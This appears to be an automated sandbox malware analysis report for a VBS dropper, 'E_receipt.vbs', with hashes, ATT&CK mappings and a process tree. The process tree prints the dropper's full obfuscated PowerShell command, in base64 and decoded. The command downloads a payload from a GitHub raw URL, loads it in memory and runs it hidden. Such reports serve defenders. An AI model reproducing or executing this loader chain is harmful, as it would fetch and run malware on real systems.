d6c42166e11a471b6c38d717461f566a183d5e1cd0264f84ec85a1ffedb1db84

General

Target

E_receipt.vbs
Size

3KB
MD5

1f7229b717e61580e9baf2830ee7afd0
SHA1

98ade23ab27475f6d62f97a45b76b247075ff421
SHA256

fa4cc3e867b36269dab9161f078565ff9048ac55ea6dccb8a39b5e156009eabf
SHA512

ed233c408b5e7f6948756ff6a7585733055de3ccb3b0408aed31b543a5da722f5e0de949cce3fef1dc22be07aa481205efd5aa2c99959195b3c6ed758e7715f3

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

exe.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
2	2296	WScript.exe
4	2296	WScript.exe
8	2936	powershell.exe
9	2936	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
612	powershell.exe
2936	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
7	raw.githubusercontent.com
8	raw.githubusercontent.com
9	raw.githubusercontent.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	2	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
612	powershell.exe
2936	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	612	powershell.exe
Token: SeDebugPrivilege	2936	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2296 wrote to memory of 612	2296	WScript.exe	30
PID 2296 wrote to memory of 612	2296	WScript.exe	30
PID 2296 wrote to memory of 612	2296	WScript.exe	30
PID 612 wrote to memory of 2936	612	powershell.exe	32
PID 612 wrote to memory of 2936	612	powershell.exe	32
PID 612 wrote to memory of 2936	612	powershell.exe	32

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\E_receipt.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2296
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnYmNmdXJsJysnID0gTzNoaHR0JysncHM6LycrJy9yYXcuZ2knKyd0aCcrJ3VidXNlcmMnKydvbnRlbnQnKycuJysnY29tL05vJysnRGV0ZWMnKyd0T24vTm9EZXRlY3RPbi9yJysnZWZzL2hlJysnYWQnKydzL21haW4vJysnRGUnKyd0YWhOb3RoJysnLVYudHh0TzNoJysnOyAnKydiY2ZiYXNlNjRDb250JysnZW4nKyd0ID0nKycgKE5lJysndycrJy1PYmplY3QgJysnU3lzdGVtLk5ldC5XZScrJ2InKydDbGllbnQpJysnLkRvJysnd25sbycrJ2FkUycrJ3RyaW4nKydnKGJjZicrJ3VybCk7ICcrJ2InKydjJysnZmJpbmFyeUNvbnQnKydlbnQnKycgPSAnKydbJysnU3lzdGVtLicrJ0MnKydvbnYnKydlcnQnKyddOjpGcm9tQmFzZTY0U3RyaScrJ25nKGJjZmJhc2U2JysnNCcrJ0NvbnRlbnQpOycrJyBiJysnY2ZhcycrJ3NlbScrJ2JseSAnKyc9IFtSZWZsZWN0aW8nKyduJysnLkFzc2VtJysnYmx5XTo6TG9hZChiJysnY2YnKydiaScrJ25hcnknKydDbycrJ250ZW50KTsnKycgW2RubGknKydiJysnLkknKydPLkhvbWVdJysnOjpWJysnQUkoJysnbHRSdHh0LjNyJysneC9tb2MueWEnKydwZXMnKydtZXRzeScrJ3MvLzpzcHR0aGwnKyd0UicrJywgJysnbHRSMWx0UicrJywnKycgbCcrJ3RSQzo0VlBQJysncm9ncmFtRCcrJ2F0YTRWUGx0UiwgJysnbHQnKydSdicrJ2FnJysnZW1sdFIsJysnIGwnKyd0UlJlZycrJ0FzbWwnKyd0JysnUiwgbHQnKydSJysnbHRSLGx0UmwnKyd0JysnUiknKSAtUkVQbEFjRShbY0hBcl03OStbY0hBcl01MStbY0hBcl0xMDQpLFtjSEFyXTM5ICAtUkVQbEFjRSAnbHRSJyxbY0hBcl0zNCAtUkVQbEFjRSAgKFtjSEFyXTUyK1tjSEFyXTg2K1tjSEFyXTgwKSxbY0hBcl05MiAtUkVQbEFjRSAnYmNmJyxbY0hBcl0zNikgfC4oICRzaEVsTElkWzFdKyRTaEVMTElEWzEzXSsneCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:612
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('bcfurl'+' = O3hhtt'+'ps:/'+'/raw.gi'+'th'+'ubuserc'+'ontent'+'.'+'com/No'+'Detec'+'tOn/NoDetectOn/r'+'efs/he'+'ad'+'s/main/'+'De'+'tahNoth'+'-V.txtO3h'+'; '+'bcfbase64Cont'+'en'+'t ='+' (Ne'+'w'+'-Object '+'System.Net.We'+'b'+'Client)'+'.Do'+'wnlo'+'adS'+'trin'+'g(bcf'+'url); '+'b'+'c'+'fbinaryCont'+'ent'+' = '+'['+'System.'+'C'+'onv'+'ert'+']::FromBase64Stri'+'ng(bcfbase6'+'4'+'Content);'+' b'+'cfas'+'sem'+'bly '+'= [Reflectio'+'n'+'.Assem'+'bly]::Load(b'+'cf'+'bi'+'nary'+'Co'+'ntent);'+' [dnli'+'b'+'.I'+'O.Home]'+'::V'+'AI('+'ltRtxt.3r'+'x/moc.ya'+'pes'+'metsy'+'s//:sptthl'+'tR'+', '+'ltR1ltR'+','+' l'+'tRC:4VPP'+'rogramD'+'ata4VPltR, '+'lt'+'Rv'+'ag'+'emltR,'+' l'+'tRReg'+'Asml'+'t'+'R, lt'+'R'+'ltR,ltRl'+'t'+'R)') -REPlAcE([cHAr]79+[cHAr]51+[cHAr]104),[cHAr]39 -REPlAcE 'ltR',[cHAr]34 -REPlAcE ([cHAr]52+[cHAr]86+[cHAr]80),[cHAr]92 -REPlAcE 'bcf',[cHAr]36) |.( $shElLId[1]+$ShELLID[13]+'x')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2936

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
115de104d2e417f732ad8ac27d2f835a

SHA1
dd210f9df79ee904e27b513249ba3a2a59ea20ff

SHA256
2119799f6fb5608553ad91f0ce7f16a1254233b52b55e2197df8cccbb77b9bda

SHA512
adb071e49f5c2410c8bc27382ee85602420aa49e1e4828788dde65bd8eee99171fa7365c81d1ee6056d99802483a7d9c5dce47f22313e3c4f765471e388f636d

Download Submit
memory/612-4-0x000007FEF50CE000-0x000007FEF50CF000-memory.dmp

Filesize
4KB

Download
memory/612-5-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

Filesize
2.9MB

Download
memory/612-6-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download
memory/612-12-0x000007FEF4E10000-0x000007FEF57AD000-memory.dmp

Filesize
9.6MB

Download
memory/612-13-0x000007FEF4E10000-0x000007FEF57AD000-memory.dmp

Filesize
9.6MB

Download
memory/612-14-0x000007FEF4E10000-0x000007FEF57AD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing